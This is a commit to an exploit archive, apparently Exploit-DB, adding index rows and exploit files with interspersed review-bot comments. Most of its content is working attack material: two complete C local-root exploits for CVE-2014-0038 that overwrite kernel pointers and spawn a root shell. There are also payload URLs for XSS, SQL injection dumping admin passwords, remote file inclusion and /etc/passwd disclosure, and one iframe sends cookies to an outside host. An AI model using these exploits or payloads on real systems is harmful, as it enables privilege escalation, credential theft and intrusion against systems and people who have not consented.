Updated 02_04_2014

This commit is contained in:
Offensive Security 2014-02-04 04:25:40 +00:00
parent 8a34f6a372
commit ef9336acb4
25 changed files with 784 additions and 0 deletions


@ -28149,3 +28149,27 @@ id,file,description,date,author,platform,type,port
31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0
31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
31346,platforms/linux/local/31346.c,"Linux 3.4+ Arbitrary write with CONFIG_X86_X32",2014-02-02,saelo,linux,local,0
31347,platforms/linux/local/31347.c,"linux 3.4+ local root (CONFIG_X86_X32=y)",2014-02-02,rebel,linux,local,0
31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 'roomid' Parameter SQL Injection Vulnerability",2008-03-06,meloulisi,php,webapps,0
31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 popup.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 dir2.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31354,platforms/php/webapps/31354.txt,"ImageVue 1.7 upload.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31355,platforms/php/webapps/31355.txt,"ImageVue 1.7 dirxml.php path Parameter XSS",2008-03-07,ZoRLu,php,webapps,0
31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 wp-admin/users.php inviteemail Parameter XSS",2008-03-07,Doz,php,webapps,0
31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 wp-admin/invites.php to Parameter XSS",2008-03-07,Doz,php,webapps,0
31358,platforms/php/webapps/31358.txt,"Specimen Image Database taxonservice.php dir Parameter Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0
31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7.0 Combined JavaScript and XML Remote Information Disclosure Vulnerability",2008-03-07,"Ronald van den Heetkamp",windows,remote,0
31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 404 Error Page Cross Site Scripting Vulnerability",2008-03-07,NetJackal,multiple,remote,0
31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 Web Management Interface Console HTML Injection Vulnerability",2008-03-08,nnposter,hardware,remote,0
31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath Parameter XSS",2008-03-08,nnposter,php,webapps,0
31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0
31367,platforms/php/webapps/31367.txt,"Batchelor Media BM Classifieds Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0
31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 'pid' Parameter SQL Injection Vulnerability",2008-03-10,meloulisi,php,webapps,0
31369,platforms/php/webapps/31369.txt,"Gallarific search.php query Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
31370,platforms/php/webapps/31370.txt,"Gallarific Multiple Script Direct Request Authentication Bypass",2008-03-10,ZoRLu,php,webapps,0
31371,platforms/php/webapps/31371.txt,"EasyImageCatalogue 1.31 index.php Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31372,platforms/php/webapps/31372.txt,"EasyImageCatalogue 1.31 thumber.php dir Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0
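Review bot: The two new CVE-2014-0038 rows (ids 31346 and 31347) leave the CVE identifier out of the description field even though both source files name it in their header comments, so this index cannot be searched by CVE; a description such as `"Linux 3.4+ Arbitrary write with CONFIG_X86_X32 (CVE-2014-0038)"`, and the matching change on the 31347 row, would fix that. Rows 31365 and 31366 are filed under platform `php` although the affected script in their descriptions is `logfileViewSettings.jsp`, which will mislead anyone filtering the index by platform; if the index has a platform value for Java/JSP applications, these two rows presumably belong there.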



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28151/info
F5 BIG-IP Web Management Interface is prone to a HTML-injection vulnerability because the web management interface fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The vulnerability affects F5 BIG-IP 9.4.3; other versions may be also affected.
https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+

199
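--- a/platforms/linux/local/31346.c
+++ b/platforms/linux/local/31346.c
@@ -0,0 +1,199 @@
+/*
+* Local root exploit for CVE-2014-0038.
+*
+* https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c
+*
+* Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer
+* passed from userspace.
+*
+* Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,
+* if the original byte at that address is known it can be overwritten
+* with known data.
+* If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.
+*
+* Restrictions: The first long at the passed address (tv_sec) has to be positive
+* and the second long (tv_nsec) has to be smaller than 1000000000.
+*
+* Overview: Target the release function pointer of the ptmx_fops structure located in
+* non initialized (and thus writable) kernel memory. Zero out the three most
+* significant bytes and thus turn it into a pointer to an address mappable in
+* user space.
+* The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec
+* is valid).
+* Open /dev/ptmx, close it and enjoy.
+*
+* Not very beautiful but should be fairly reliable if symbols can be resolved.
+*
+* Tested on Ubuntu 13.10
+*
+* gcc timeoutpwn.c -o pwn && ./pwn
+*
+* Written by saelo
+*/
+#define _GNU_SOURCE
+#include <netinet/ip.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#define __X32_SYSCALL_BIT 0x40000000
+#undef __NR_recvmmsg
+#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+#define BUFSIZE 200
+#define PAYLOADSIZE 0x2000
+#define FOPS_RELEASE_OFFSET 13*8
+/*
+* Adapt these addresses for your need.
+* see /boot/System.map* or /proc/kallsyms
+* These are the offsets from ubuntu 3.11.0-12-generic.
+*/
+#define PTMX_FOPS 0xffffffff81fb30c0LL
+#define TTY_RELEASE 0xffffffff8142fec0LL
+#define COMMIT_CREDS 0xffffffff8108ad40LL
+#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+/*
+* Match signature of int release(struct inode*, struct file*).
+*
+* See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz
+*/
+int __attribute__((regparm(3)))
+kernel_payload(void* foo, void* bar)
+{
+_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
+_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
+*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer
+commit_creds(prepare_kernel_cred(0));
+return -1;
+}
+/*
+* Write a zero to the byte at then given address.
+* Only works if the current value is 0xff.
+*/
+void zero_out(long addr)
+{
+int sockfd, retval, port, pid, i;
+struct sockaddr_in sa;
+char buf[BUFSIZE];
+struct mmsghdr msgs;
+struct iovec iovecs;
+srand(time(NULL));
+port = 1024 + (rand() % (0x10000 - 1024));
+sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+if (sockfd == -1) {
+perror("socket()");
+exit(EXIT_FAILURE);
+}
+sa.sin_family = AF_INET;
+sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+sa.sin_port = htons(port);
+if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+perror("bind()");
+exit(EXIT_FAILURE);
+}
+memset(&msgs, 0, sizeof(msgs));
+iovecs.iov_base = buf;
+iovecs.iov_len = BUFSIZE;
+msgs.msg_hdr.msg_iov = &iovecs;
+msgs.msg_hdr.msg_iovlen = 1;
+/*
+* start a seperate process to send a udp message after 255 seconds so the syscall returns,
+* but not after updating the timout struct and writing the remaining time into it.
+* 0xff - 255 seconds = 0x00
+*/
+printf("clearing byte at 0x%lx\n", addr);
+pid = fork();
+if (pid == 0) {
+memset(buf, 0x41, BUFSIZE);
+if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+perror("socket()");
+exit(EXIT_FAILURE);
+}
+sa.sin_family = AF_INET;
+sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+sa.sin_port = htons(port);
+printf("waiting 255 seconds...\n");
+for (i = 0; i < 255; i++) {
+if (i % 10 == 0)
+printf("%is/255s\n", i);
+sleep(1);
+}
+printf("waking up parent...\n");
+sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
+exit(EXIT_SUCCESS);
+} else if (pid > 0) {
+retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
+if (retval == -1) {
+printf("address can't be written to, not a valid timespec struct\n");
+exit(EXIT_FAILURE);
+}
+waitpid(pid, 0, 0);
+printf("byte zeroed out\n");
+} else {
+perror("fork()");
+exit(EXIT_FAILURE);
+}
+}
+int main(int argc, char** argv)
+{
+long code, target;
+int pwn;
+/* Prepare payload... */
+printf("preparing payload buffer...\n");
+code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
+memset((void*)code, 0x90, PAYLOADSIZE);
+code += PAYLOADSIZE - 1024;
+memcpy((void*)code, &kernel_payload, 1024);
+/*
+* Now clear the three most significant bytes of the fops pointer
+* to the release function.
+* This will make it point into the memory region mapped above.
+*/
+printf("changing kernel pointer to point into controlled buffer...\n");
+target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
+zero_out(target + 7);
+zero_out(target + 6);
+zero_out(target + 5);
+/* ... and trigger. */
+printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
+pwn = open("/dev/ptmx", 'r');
+close(pwn);
+if (getuid() != 0) {
+printf("failed to get root :(\n");
+exit(EXIT_FAILURE);
+}
+printf("got root, enjoy :)\n");
+return execl("/bin/bash", "-sh", NULL);
+}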
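Review bot: The address block from PTMX_FOPS to PREPARE_KERNEL_CRED is the only thing binding this file to one kernel build, yet the comment above it ("Adapt these addresses for your need") does not say what a mismatch does; since zero_out uses those addresses as the recvmmsg timeout pointer and thereby modifies kernel memory, a wrong value will presumably corrupt an unrelated kernel object rather than fail cleanly, and the comment should say so for anyone running this as a regression check. The header records only "Tested on Ubuntu 13.10" and states no precondition for the bug itself; a line such as `* Not applicable on kernels built without CONFIG_X86_X32 or with the CVE-2014-0038 fix applied.` would make that explicit.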

226
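--- a/platforms/linux/local/31347.c
+++ b/platforms/linux/local/31347.c
@@ -0,0 +1,226 @@
+/*
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
+CVE-2014-0038 / x32 ABI with recvmmsg
+by rebel @ irc.smashthestack.org
+-----------------------------------
+takes about 13 minutes to run because timeout->tv_sec is decremented
+once per second and 0xff*3 is 765.
+some things you could do while waiting:
+* watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
+* read https://wiki.ubuntu.com/Security/Features and smirk a few times
+* brew some coffee
+* stare at the countdown giggly with anticipation
+could probably whack the high bits of some pointer with nanoseconds,
+but that would require a bunch of nulls before the pointer and then
+reading an oops from dmesg which isn't that elegant.
+&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
+hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
+anyway..
+same principle will work on 32bit but I didn't really find any major
+distros shipping with CONFIG_X86_X32=y
+user@ubuntu:~$ uname -a
+Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
+user@ubuntu:~$ ./recvmmsg
+byte 3 / 3.. ~0 secs left.
+w00p w00p!
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# sh phalanx-2.6b-x86_64.sh
+unpacking..
+:)=
+greets to my homeboys kaliman, beist, capsl & all of #social
+Sat Feb 1 22:15:19 CET 2014
+% rebel %
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+*/
+#define _GNU_SOURCE
+#include <netinet/ip.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/utsname.h>
+#define __X32_SYSCALL_BIT 0x40000000
+#undef __NR_recvmmsg
+#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+#define VLEN 1
+#define BUFSIZE 200
+int port;
+struct offset {
+char *kernel_version;
+unsigned long dest; // net_sysctl_root + 96
+unsigned long original_value; // net_ctl_permissions
+unsigned long prepare_kernel_cred;
+unsigned long commit_creds;
+};
+struct offset offsets[] = {
+{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
+{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
+{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
+{NULL,0,0,0,0}
+};
+void udp(int b) {
+int sockfd;
+struct sockaddr_in servaddr,cliaddr;
+int s = 0xff+1;
+if(fork() == 0) {
+while(s > 0) {
+fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
+sleep(1);
+s--;
+fprintf(stderr,".");
+}
+sockfd = socket(AF_INET,SOCK_DGRAM,0);
+bzero(&servaddr,sizeof(servaddr));
+servaddr.sin_family = AF_INET;
+servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
+servaddr.sin_port=htons(port);
+sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
+exit(0);
+}
+}
+void trigger() {
+open("/proc/sys/net/core/somaxconn",O_RDONLY);
+if(getuid() != 0) {
+fprintf(stderr,"not root, ya blew it!\n");
+exit(-1);
+}
+fprintf(stderr,"w00p w00p!\n");
+system("/bin/sh -i");
+}
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+// thx bliss
+static int __attribute__((regparm(3)))
+getroot(void *head, void * table)
+{
+commit_creds(prepare_kernel_cred(0));
+return -1;
+}
+void __attribute__((regparm(3)))
+trampoline()
+{
+asm("mov $getroot, %rax; call *%rax;");
+}
+int main(void)
+{
+int sockfd, retval, i;
+struct sockaddr_in sa;
+struct mmsghdr msgs[VLEN];
+struct iovec iovecs[VLEN];
+char buf[BUFSIZE];
+long mmapped;
+struct utsname u;
+struct offset *off = NULL;
+uname(&u);
+for(i=0;offsets[i].kernel_version != NULL;i++) {
+if(!strcmp(offsets[i].kernel_version,u.release)) {
+off = &offsets[i];
+break;
+}
+}
+if(!off) {
+fprintf(stderr,"no offsets for this kernel version..\n");
+exit(-1);
+}
+mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
+mmapped &= 0x000000ffffffffff;
+srand(time(NULL));
+port = (rand() % 30000)+1500;
+commit_creds = (_commit_creds)off->commit_creds;
+prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
+mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
+if(mmapped == -1) {
+perror("mmap()");
+exit(-1);
+}
+memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
+memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
+if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
+perror("mprotect()");
+exit(-1);
+}
+sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+if (sockfd == -1) {
+perror("socket()");
+exit(-1);
+}
+sa.sin_family = AF_INET;
+sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+sa.sin_port = htons(port);
+if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+perror("bind()");
+exit(-1);
+}
+memset(msgs, 0, sizeof(msgs));
+iovecs[0].iov_base = &buf;
+iovecs[0].iov_len = BUFSIZE;
+msgs[0].msg_hdr.msg_iov = &iovecs[0];
+msgs[0].msg_hdr.msg_iovlen = 1;
+for(i=0;i < 3 ;i++) {
+udp(i);
+retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+if(!retval) {
+fprintf(stderr,"\nrecvmmsg() failed\n");
+}
+}
+close(sockfd);
+fprintf(stderr,"\n");
+trigger();
+}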
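Review bot: The offsets table mixes two conventions for dest: the first row writes `0xffffffff81cdf400+96` while the other two rows carry a pre-summed value, yet the struct comment `// net_sysctl_root + 96` reads as if every row stored the symbol base; a comment on the table stating that each dest is already the final address (or writing the first row in the same form as the others) would remove the ambiguity. The table is also matched on the exact uname release string, so the "no offsets for this kernel version.." exit in main means only that the build is unlisted, not that the kernel is unaffected; that is worth saying in the message or the header, because someone running the program as a vulnerability check will read it the other way.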


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28148/info
Neptune Web Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Neptune Web Server Professional Edition 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/<IMG SRC="javascript:alert('XSS');">


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28128/info
The 4nChat module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,aid,3,4,5+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,pwd,3,4,5+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,email,3,4,5+from+nuke_authors


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/popup.php?path="><script>alert("xss")</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/test/dir2.php?path="><script>alert("xss")</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/admin/upload.php?path="><script>alert("xss")</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28138/info
Imagevue is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Imagevue 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/upload/dirxml.php?path="><script>alert("xss")</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28139/info
WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WordPress 2.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/users.php?update=invite&inviteemail=>< iframe src=http://members.lycos.co.uk/Account/CookieMonster.php width=0 height=0>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28139/info
WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WordPress 2.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/invites.php?result=sent&to=%22%3E%3Cscript%3Ealert


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28142/info
SID (Specimen Image Database) is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/SID_box_notns_path/taxonservice.php?dir=shell.txt?

16
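--- a/platforms/php/webapps/31365.txt
+++ b/platforms/php/webapps/31365.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/28152/info
+Alkacon OpenCms is prone to multiple input-validation vulnerabilities, including one cross-site scripting issue and a file-disclosure issue, because the application fails to properly sanitize user-supplied input.
+Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to obtain information that could aid in further attacks.
+OpenCms 7.0.3 is vulnerable; other versions may also be affected.
+http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
+isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true
+&ok=Ok&action=save
+&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview
+&elementname=undefined&page=page1&style=new
+&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings
+&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8
+&filePath.0=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E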
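Review bot: The proof-of-concept request is printed across eight lines, from the line ending in `logfileViewSettings.jsp?` to the line starting `&filePath.0=`, with nothing saying whether the line breaks are part of the payload, so a reader cannot tell whether this is one GET request wrapped for readability or several; a single line such as `# one GET request, wrapped at the '&' separators for readability` above the URL would settle it. The same layout, and the same question, applies to 31366.txt in this commit.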

16
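--- a/platforms/php/webapps/31366.txt
+++ b/platforms/php/webapps/31366.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/28152/info
+Alkacon OpenCms is prone to multiple input-validation vulnerabilities, including one cross-site scripting issue and a file-disclosure issue, because the application fails to properly sanitize user-supplied input.
+Attackers can exploit these issues to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to obtain information that could aid in further attacks.
+OpenCms 7.0.3 is vulnerable; other versions may also be affected.
+http://www.example.com/opencms/system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp?
+isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true
+&ok=Ok&action=save
+&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace%252Flogfileview
+&elementname=undefined&page=page1&style=new
+&path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings
+&elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8
+&filePath.0=%2Fetc%2Fpasswd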


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28159/info
BM Classifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
http://www.example.com/pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28162/info
The 4nAlbum module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,aid,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,pwd,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors
http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,email,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28163/info
Gallarific is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add new categories, add new users, and modify existing users. Other attacks are also possible.
These issues affect both the commercial and the free versions of Gallarific.
http://www.example.com/gallery/search.php?dosearch=true&query="><script>alert(document.cookie)</script>

11
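--- a/platforms/php/webapps/31370.txt
+++ b/platforms/php/webapps/31370.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28163/info
+Gallarific is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add new categories, add new users, and modify existing users. Other attacks are also possible.
+These issues affect both the commercial and the free versions of Gallarific.
+http://www.example.com/gallery/gadmin/index.php?task=add (categori add)
+http://www.example.com/gallery/gadmin/users.php?task=edit&id=2 (user edit)
+http://www.example.com/gallery/gadmin/users.php?task=add (user add)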

10
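--- a/platforms/php/webapps/31371.txt
+++ b/platforms/php/webapps/31371.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28164/info
+onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
+http://www.example.com/index.php?search="><script>alert()</script>
+http://www.example.com/index.php?d="><script>alert()</script>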


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28164/info
onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/thumber.php?dir="><script>alert()</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28164/info
onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/describe.php?d="><script>alert()</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28164/info
